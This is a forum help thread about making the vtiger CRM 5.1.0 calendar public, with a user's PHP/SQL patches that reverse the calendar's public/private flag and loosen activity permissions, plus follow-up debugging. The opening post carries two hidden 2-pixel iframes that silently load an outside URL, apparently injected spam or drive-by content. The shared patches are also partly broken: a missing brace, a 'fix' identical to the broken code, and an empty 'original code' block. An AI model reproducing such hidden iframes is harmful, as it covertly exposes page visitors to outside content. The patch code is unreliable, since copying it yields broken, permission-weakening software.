Way to make Calendar Public?

edited December 2012 in Help - 5.1.0 Vote Up0Vote Down
In sharing access, Calendar is listed as private, but when you edit the modules, calendar is no longer listed so you can't change the access for it. Is there any way to set the calendar as public? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;


  • 23 Comments sorted by Votes Date Added
  • anybody figure out anything for this? i have read the manual and fully understand the hierarchical model and calendar sharing, but does anyone know of a way to modify the code to force the entire calendar module to be set as public? the fact that calendar is listed in sharing access with private checked makes me believe that there may be some way on the back end to change the privacy settings?
  • i just completed a work around for my install. we operate as a team so anyone that has access to a record (contact, potential, account, etc) should be able to see all pending and completed activities linked to that record. they should also be able to edit those same activities. the challenge i have had with other solutions is that they completely broke permissions in regard to calendars.

    here are the bullet points of how this fix works;

    - the public check box on events is reversed to private. default is public for events & tasks.

    - if a user has permission to view a record they can view/edit/delete all tasks & events that are not marked private (see 1st bullet point)

    - in the calendar module under all events & todos, a user can only see events & tasks from other users that have shared their calender and not marked the event private.

    here are the code mods
    modify getrelatedlistview function, line 84 in include/relatedlistview.php

    original code:
    if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
    $query .= ' '.$sec_parameter;

    modified code:
    if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
    // cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
    if($relatedmodule == "calendar") //cw
    $sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
    else { // cw
    $sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions

    $query .= ' '.$sec_parameter;

    this affects all incomplete activities in a record detailview.

    modify gethistory function, line 456 in include/relatedlistview.php

    original code:

    modified code:
    $sec_parameter=' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')';

    this affects all completed activities in a record detailview.


    modify ispermitted function, line 755 in include/utils/userinfoutil.php

    original code:
    $permission = "no";
    if($module == 'users' || $module == 'home' || $module == 'uploads')

    modified code: insert the code snippet
    $permission = "no";
    // cw - create special check for calendars - if entity that activity is attached to is shared then calendar should be shared - allows viewing & editing
    if($module == 'calendar' && is_numeric($record_id)) { // cw
    $sql = 'select se.crmid as id, e.setype from vtiger_seactivityrel se join vtiger_crmentity e on e.crmid = se.crmid and e.deleted=0 where se.activityid = '.$record_id. //cw
    ' union all select contactid as id, "contacts" as setype from vtiger_cntactivityrel where activityid = '.$record_id; // cw
    $rsl = mysql_query($sql); // cw
    while($data = mysql_fetch_array($rsl)) { //cw
    // cw - if any entity attached to activity has view permission then show the activity
    if(ispermitted($data["setype"], "detailview", $data["id"]) == "yes") // cw
    return "yes"; // cw
    } // cw - while
    } // cw - if($module - end code addition
    if($module == 'users' || $module == 'home' || $module == 'uploads')

    this allows a user that has permission to see a record the permission to see the activities linked to the record


    modify getlistviewsecurityparameter, in include/utils/userinfoutil.php

    original code:
    $condition = " or (vtiger_crmentity.smownerid in($shared_ids) and vtiger_activity.visibility = 'public')";

    modified code:
    $condition = " or (vtiger_crmentity.smownerid in($shared_ids) and vtiger_activity.visibility != 'public')";

    this reverses the use of the public check box on events


    modify getseclistviewsecurityparameter, in include/utils/userinfoutil.php

    original code:
    $condition = " or (vtiger_crmentity$module.smownerid in($shared_ids) and vtiger_activity.visibility = 'public')";

    modified code:
    $condition = " or (vtiger_crmentity$module.smownerid in($shared_ids) and vtiger_activity.visibility != 'public')";

    this reverses the use of the public check box on events


    modify iscalendarpermittedbysharing, in include/utils/userinfoutil.php

    original code:
    $query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility='public' and smownerid !=0) and sharedid=?";

    modified code:
    $query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility!='public' and smownerid !=0) and sharedid=?";

    this reverses the use of the public check box on events


    modify the language label in modules/calendar/language/en_us.lang.php
    'lbl_public'=>'mark private'

    this changes the check box so it says mark private instead of mark public


    to the vtiger team, thanks for working on a great product. i won't speak for everyone, but most organizations share information between people. anyone that has permission to view a record (contact, potential, account, etc) should also be able to see the activity related to that record unless explicitly marked private. with the mods above a user cannot see every activity on another users calendar. they can only see activities linked to records that they have permission to work on. i hope you will consider incorporating something like this into future versions.

  • hi, it seems a great solution, but i don't understand a step: when you wrote:


    modify iscalendarpermittedbysharing, in include/utils/userinfoutil.php

    original code:
    $query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility='public' and smownerid !=0) and sharedid=?";

    modified code:
    $query = "select * from vtiger_sharedcalendar where userid in(select smownerid from vtiger_activity inner join vtiger_crmentity on vtiger_crmentity.crmid=vtiger_activity.activityid where activityid=? and visibility!='public' and smownerid !=0) and sharedid=?";

    this reverses the use of the public check box on events


    i cant see difference between original and modified code. can you help me?
  • the only difference is ! in the query


    changes to


    what this does is treat anything marked as public in the database as private. this seemed more intuitive for a crm. everything is public by default and you can make it private by checking a box. it is unlikely that people remember to check public on every action they enter.
  • ty for answer, i make modification to my crm code but when i try to log in i obtain a blank page. i think problem is about first step
    modify getrelatedlistview function, line 84 in include/relatedlistview.php

    original code:
    if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
    $query .= ' '.$sec_parameter;

    modified code:
    if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
    // cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
    if($relatedmodule == "calendar") //cw
    $sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
    else { // cw
    $sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions

    $query .= ' '.$sec_parameter;


    when i delete this mod i can login fine

    can you help me?

    p.s.. i try to clean smarty/templates_c cache but the issue remain
  • i think you have to add another closing } after the last } to match the brackets. i did this and it works again.

    so instead of
    if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
    // cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
    if($relatedmodule == "calendar") //cw
    $sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
    else { // cw
    $sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions

    $query .= ' '.$sec_parameter;

    the code has to be

    if($is_admin==false && $profileglobalpermission[1] == 1 && $profileglobalpermission[2] == 1 && $defaultorgsharingpermission[$tab_id] == 3){
    // cw - don't apply sharing restrictions to calendar items - shows all incomplete activities
    if($relatedmodule == "calendar") //cw
    $sec_parameter = ' and (vtiger_activity.visibility != "public" or vtiger_crmentity.smownerid = '.$current_user->id.')'; // cw
    else { // cw
    $sec_parameter=getlistviewsecurityparameter($relatedmodule); // cw - original line to apply sharing permissions

    $query .= ' '.$sec_parameter;
  • ty much, your help solve my issue.
  • thank you very much for your contribution, colin.
    without actually having started to use vtiger in our daily routine i feel this is a prerequisite for a smoothly running, collaborative system.

  • thanks for catching that closing bracket wadex. i must have missed it when i copied the code mods. hope it is useful. i agree that it is a must have for any sales team.
  • this is awesome! thanks so much for this. the only thing i would like to change is to make the actions view only instead of editable. i've read through all the code changes but i don't see where edit access is explicitly granted. is there a way to do this?
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